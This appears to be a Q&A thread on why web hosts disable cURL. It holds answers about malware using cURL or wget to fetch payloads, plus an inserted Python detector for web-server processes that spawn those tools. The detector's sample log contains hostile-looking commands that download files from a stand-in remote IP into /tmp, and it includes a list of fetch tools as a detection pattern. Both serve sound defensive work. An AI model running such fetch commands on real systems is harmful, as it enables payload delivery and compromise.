1

Many hosts tend to disable cURL because of "some" security reasons.

I'm looking for these reasons. A quick Google lookup didn't give me any in-depth information.

tomsseisums

3 Answers

2

Many infections (especially botnet types and some admin-shell types) that abuse arbitrary code execution vulnerabilities will inject a small payload script that then uses cURL or wget to download further instructions and configuration. It may be blocked in an attempt to limit the impact of these robotic attacks.

Cheekysoft
  • So, Curl itself is not the problem, it is the code retrieved, right? – Sebas Jan 31 '14 at 18:35
  • @Sebas The real problem is how an attacker was able to execute arbitrary commands on your system in the first place. Smart enough exploits will always be able to work around various binaries being unavailable on the target system. – Cheekysoft Feb 03 '14 at 09:40
  • In my case I'm interested in this subject because I open a frame for the users to enter their own PHP code executed on the server. I'm evaluating the risks of having cURL activated, which is necessary for SOAP operations I need to allow. – Sebas Feb 03 '14 at 16:27
  • @Sebas, you already have an arbitrary remote code execution vulnerability, by design; why worry about curl? So many functions in PHP are exceptionally dangerous to allow unchecked arguments to pass into. Are you familiar with http://stackoverflow.com/a/3697776/1820 ? See also http://security.stackexchange.com/a/1407/5086 – Cheekysoft Feb 03 '14 at 16:46
  • Yes of course I disabled all these functions. I was thinking that cURL is probably not that dangerous so I came here to double check. – Sebas Feb 03 '14 at 23:51
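
The pattern described in the answer above (a web-facing process launching cURL or wget to fetch further instructions) can be looked for in process-execution logs. This is an added example, not part of the original answer or its comments; the log format, field names and the list of web-server process names are constructed assumptions.

```python
import re
import shlex

# Constructed process-execution records (hypothetical format, not a real tool's output):
# timestamp, user, parent process name, command line. IPs are documentation addresses.
SAMPLE_LOG = """\
2014-02-03T09:40:01 user=www-data parent=php-fpm cmd="curl -s -o /tmp/.x http://203.0.113.7/c.txt"
2014-02-03T09:41:12 user=deploy parent=bash cmd="curl -O https://example.org/release.tar.gz"
2014-02-03T09:42:30 user=www-data parent=apache2 cmd="/usr/bin/wget -q http://203.0.113.7/b.pl"
2014-02-03T09:43:05 user=www-data parent=php-fpm cmd="convert in.png out.jpg"
"""

# Assumption: process names that serve web requests on this host; adjust per system.
WEB_PARENTS = {"php-fpm", "php-cgi", "apache2", "httpd", "nginx"}
FETCH_TOOLS = {"curl", "wget"}

LINE_RE = re.compile(r'^(\S+) user=(\S+) parent=(\S+) cmd="(.*)"$')


def find_web_spawned_fetches(log_text):
    """Return records where a web-server process launched curl or wget."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not follow the constructed format
        ts, user, parent, cmd = m.groups()
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()  # unbalanced quotes: fall back to a plain split
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]  # treat /usr/bin/wget as wget
        if parent in WEB_PARENTS and tool in FETCH_TOOLS:
            urls = [a for a in argv[1:] if a.startswith(("http://", "https://"))]
            hits.append({"time": ts, "user": user, "parent": parent,
                         "tool": tool, "urls": urls})
    return hits


if __name__ == "__main__":
    for hit in find_web_spawned_fetches(SAMPLE_LOG):
        print(hit)
```

The check covers only the curl and wget binaries; as the comment above notes, it does not address how the commands came to be executed in the first place.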
1

I remember there were some bugs in cURL with PHP version, but it was a long time ago and all PHP versions used now have no cURL exploits.

Mohamed Atef
0

I guess the real reason is not security, but rather financial ;) Once you pay them, there is no problem with cURL anymore.

c69